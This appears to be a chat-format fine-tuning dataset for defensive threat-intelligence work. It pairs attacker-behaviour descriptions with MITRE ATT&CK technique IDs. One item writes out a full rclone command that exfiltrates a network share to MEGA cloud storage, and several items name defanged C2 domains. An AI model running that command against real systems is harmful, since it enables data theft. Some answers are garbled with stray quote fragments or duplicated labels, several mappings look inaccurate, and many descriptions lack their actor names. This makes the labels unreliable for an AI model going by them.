- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used various types of scripting for execution, including .bat and .vbs scripts. The group has also used macros to deliver malware such as and ."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has a function to hijack data from the clipboard by monitoring the contents of the clipboard and replacing the cryptocurrency wallet with the attacker's."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CostaBricks has been used to load SombRAT onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has masqueraded as legitimate Adobe Content Management System files."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using the built-in expand.exe utility provided by Microsoft Windows, the dropper executes the following command, which will expand the CAB file and write the results to the provided directory"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has established GitHub accounts to host their malware."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "queries the Registry for specific keys for potential privilege escalation and proxy information."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y \"\\\\SERVER\\Shares\" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The plugin uses the same network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent. The following commands were observed: tasklist ipconfig /all The attacker performed these two commands 33 seconds apart"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel', 'T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download and execute a second-stage payload."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a PowerShell script to launch shellcode that retrieves an additional payload."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin can enumerate the OS version and hostname of a targeted machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kobalos can modify timestamps of replaced files, such as \"ssh\" with the added credential stealer or \"sshd\" used to deploy Kobalos."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Delphi variant of Cannon does not use legitimate web-based email services for its C2 communications, instead opting to use email accounts at an actor owned domain, ambcomission[.]com"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has enumerated drives, OS type, OS version, and other information using a script or the \"systeminfo\" command."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Similar to RIPTIDE campaigns, APT12 infects target systems with HIGHTIDE using a Microsoft Word (.doc) document that exploits CVE-2012-0158. FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases. Based on past APT12 activity, we expect the threat group to continue to utilize phishing as a malware delivery method"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pisloader has a command to upload a file to the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The winupdate.ps1 script (SHA256: 36862f654c3356d2177b5d35a410c78ff9803d1d7d20da0b82e3d69d640e856e) is the main payload of this attack that we call RogueRobin. Its developer used the open source Invoke-Obfuscation tool to obfuscate this PowerShell script, specifically using the COMPRESS technique offered by Invoke-Obfuscation. Before carrying out any of its functionality the payload checks to see if it is executing in a sandbox. The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment. The specific sandbox checks include"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "messengers. Figures 9 and 10 show FakeM attempting to resemble MSN or Yahoo. Messenger traffic, as the first 32-bytes contain data that resemble legitimate traffic generated by these chat programs"
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The malicious attachment was a simple PE file (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63) with the filename <redacted> Technical Services.exe. Its sole purpose here is to install the QUADAGENT backdoor and execute it. Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "delivered to victims via a compromised legitimate website."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used a tool called GREASE to add a Windows admin account in order to allow them continued access via RDP."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Green Lambert can collect the date and time from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IceApple can use a Base64-encoded AES key to decrypt tasking."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing has used chmod to modify permissions on key files for use."
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Variants of Emissary encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the \"srand\" and \"rand\" functions."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "tries to add a Registry Run key under the name \"Windows Update\" to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has used WMI queries to check if various security applications were running, including VMWare and Virtualbox."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Payloads The delivery documents in this attack campaign loaded remote templates whose macros installed a variety of first-stage payloads"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can launch cmd.exe to perform reconnaissance commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It appears Russian cyber criminals were equally perplexed by the WCry campaign as the rest of the world. One of the members of the popular underground community complained about the recently purchased Virtual Private Server (VPS) which was almost immediately infected by ransomware even before the system update was completed."
- },
- {
- "role": "assistant",
- "content": "T1584.003 - Virtual Private Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT18 uses DNS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET adds malicious file paths to the \"DYLD_FRAMEWORK_PATH\" and \"DYLD_LIBRARY_PATH\" environment variables to execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1574.006 - Hijack Execution Flow: LD_PRELOAD"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has modified ComSysApp service to load the malicious DLL payload."
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can perform a decremental-xor encryption on the initial C2 request before sending it over the wire."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar has encrypted data before sending it to the server."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has used VBS code on victims’ systems."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can collect information from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XTunnel uses SSL/TLS and RC4 to encrypt traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses credential dumpers such as and to extract cached credentials from Windows systems."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer can enumerate remote computers in the compromised network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "’s LSADUMP::DCShadow module can be used to make AD updates by temporarily setting a computer to be a DC."
- },
- {
- "role": "assistant",
- "content": "T1207 - Rogue Domain Controller"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk has used Wake-on-Lan to power on turned off systems for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can list the running processes and get the process ID and parent process’s ID."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Cybereason platform was able to detect the malicious injection, identifying Irdsnhrxxxfery64.~, Irdsnhrxxxfery98.~, and module arqueiro. The downloaded modules found in regsvr32.exe as detected by the Cybereason platform"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can compress and archive collected files using WinRAR."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used Mimikatz to generate Kerberos golden tickets."
- },
- {
- "role": "assistant",
- "content": "T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER may collect process information by running \"tasklist\" on a victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Hunting for PDF files that are created with the same “DocumentID” management metadata field result in a set of files that have been used in email delivery against banking entities. 2) All of the PDF files embed a link based on a Google redirect, leading to the download of a Microsoft Office document file. 3) The Microsoft Office document files contain macros for code execution. Those macros match the characteristics of the builder that we have characterized"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nidiran can download and execute files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a keylogger to capture keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has used valid credentials with various services during lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This extreme level of variance was also applied to non-executable entities, such as WMI persistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Tools and binaries used by the attackers (e.g. ADFIND legit tool) were always renamed and placed in folders that mimicked existing programs and files already present on a machine. This blending was not just used for files, but for other elements. For example, WMI persistence filters were created with names and queries matching other scripts present in affected organizations. Before running intensive and continued hands-on keyboard activity, the attackers took care of disabling event logging using AUDITPOL and re-enabling it afterward. The firewall rules were also methodically removed after the network reconnaissance was completed. Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services. We believe that the attackers used timestomping to change timestamps of artifacts and also leveraged professional wiping procedures and tools to complicate finding and recovering of DLL implants from affected environments"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute commands with script as well as execute JavaScript."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing has used valid SSH credentials to access remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "dellLemb||> deletes the registry key \\Software\\Microsoft\\Internet Explorer\\notes. EXECPROGAM calls ShellExecute to run the application given in the command. NOVOLEMBRETE creates and stores data sent with the command in the registry key \\Software\\Microsoft\\Internet Explorer\\notes"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used spearphishing with an attachment to deliver files with exploits to initial victims."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It runs the ipconfig command to gather information about the machine's network adapter configuration. It sends an HTTP POST request to the URL: hxxp://zeplin.atwebpages.com/inter.php and exfiltrates the ipconfig output gathered from the machine"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By default, Excel does not allow the download of data from the remote server, but will ask for the user’s consent by presenting the dialog box in Figure 2: Figure 2 Excel security notice for .iqy files By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE creates a scheduled task to run itself every three minutes."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has sent e-mails with malicious attachments that lead victims to credential harvesting websites."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We identified a MacOS backdoor (detected by Trend Micro as OSX_OCEANLOTUS.D) that we believe is the latest version of a threat used by OceanLotus (a.k.a. The attackers behind OSX_OCEANLOTUS.D target MacOS computers which have the Perl programming language installed"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elise creates a file in \"AppData\\Local\\Microsoft\\Windows\\Explorer\" and stores all harvested data in that file."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 collected system architecture information. APT19 used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch (LZW) algorithm."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors downloaded archives of collected data previously staged on a target's OWA server via HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1048.002 - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp uses Perl scripts."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
